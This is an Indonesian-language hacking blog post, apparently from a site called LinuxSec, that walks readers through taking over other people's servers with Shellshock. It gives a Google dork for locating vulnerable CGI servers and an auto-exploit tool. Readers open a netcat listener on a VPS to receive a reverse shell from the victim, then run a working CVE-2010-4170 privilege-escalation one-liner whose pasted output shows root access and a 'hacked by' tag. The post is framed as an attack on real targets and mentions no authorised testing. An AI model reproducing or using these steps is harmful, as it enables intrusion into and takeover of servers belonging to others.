• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

From Shellshock Exploit to Server Full Root Acces

June 5, 2016 by Jack Wilder Leave a Comment

Sebenarnya Shellshock Exploit ini termasuk exploit lama. Saya kenal exploit ini di 2014 lalu. Namun beberapa hari belakangan ini kembali ramai semenjak teman teman dari IndoXploit Coders membuat tools autoexploit untuk bug ini, apalagi yang lebih menarik adalah rata rata yang vuln oleh exploit ini adalah server tua dimana kita bisa mendapat hak akses penuh alias id “root” di server yang kita retas tersebut.

Seperti screenshot diatas, kita benar benar mendapatkan akses root diserver target.
Dork : 
intext:”Sun Microsystems, Inc. All rights reserved.” inurl:/cgi-bin/
use your brain bitch!
Tools : 
Shellshock Autoexploit Tool
Nah, setelah kalian mendapatkan web atau server yang dirasa vuln, kita bisa melakukan exploit shellshock nya.
Pertama dari VPS ( atau dari ip statis jika kalian punya ), kita lakukan back connect dengan memasukkan command 

nc -l 1337 

( 1337 adalah port yang akan kita buka, silahkan tentukan sendiri bebas )
Setelah itu dari tool autoexploitnya kita masukkan url target, ip dari VPS / ip publik kita, dan juga port yang kita gunakan untuk back connect tadi. Tools ini sendiri otomatis akan melakukan reverse shell sehingga kita akan mendapatkan bash shell dari server target di vps kita.
Pertama kita cek dulu di versi kernel nya.

uname -a

Seperti yang saya katakan sebelumnya bahwa rata rata yang bakal vuln adalah server tua ( rata rata adalah 2010) , maka kita bisa melakukan previlege escalation disini memanfaatkan bug CVE-2010-4170.
Lihat detail exploitnya disini :
https://www.exploit-db.com/exploits/15620/
https://rhn.redhat.com/errata/RHSA-2010-0894.html

[[email protected] tmp]$ printf “install uprobes /bin/sh” > exploit.conf; MODPROBE_OPTIONS=”-C exploit.conf” staprun -u
 whatever
echo ” hacked by yzrinori “; uname -rv; whoami; id
 hacked by yzrinori
2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:14 EDT 2010
root
uid=0(root) gid=0(root) groupes=500(ttaserv)

Nah bagi yang masih bingung, kalian bisa pelajari tentang manual exploit untuk shellshock sendiri disini :
http://exploit.linuxsec.org/2015/05/shellshock-vulnerability-exploit-on.html
Cukup sekian share kali ini, semoga bermanfaat, jangan lupa subscribe untuk mendapat tutorial terbaru.
Credit :
indoxploit.or.id – linuxsec.org

Filed Under: Uncategorized Tagged With: Exploit, Hacking

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Cara Mendapatkan RDP Gratis Dengan Shell Windows

bWAPP Remote File Inclusion Medium Security Level

MyBB 1.8.x SQL Injection Auto Exploit

Cracking FTP Password using Hydra on BackBox Linux

WordPress 4.7.0/4.7.1 Content Injection Exploit

Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

Tool Deface Opencart Bruteforce and Upload Image

Bruteforce FTP Login dengan Metasploit Module FTP Authentication Scanner

Tutorial Hack WHM dan cPanel dengan WHMCS Killer

Exploit Drupal Core 7.x Auto SQL Injection dan Upload Shell

LinuxSec / 9 queries in 0.13 seconds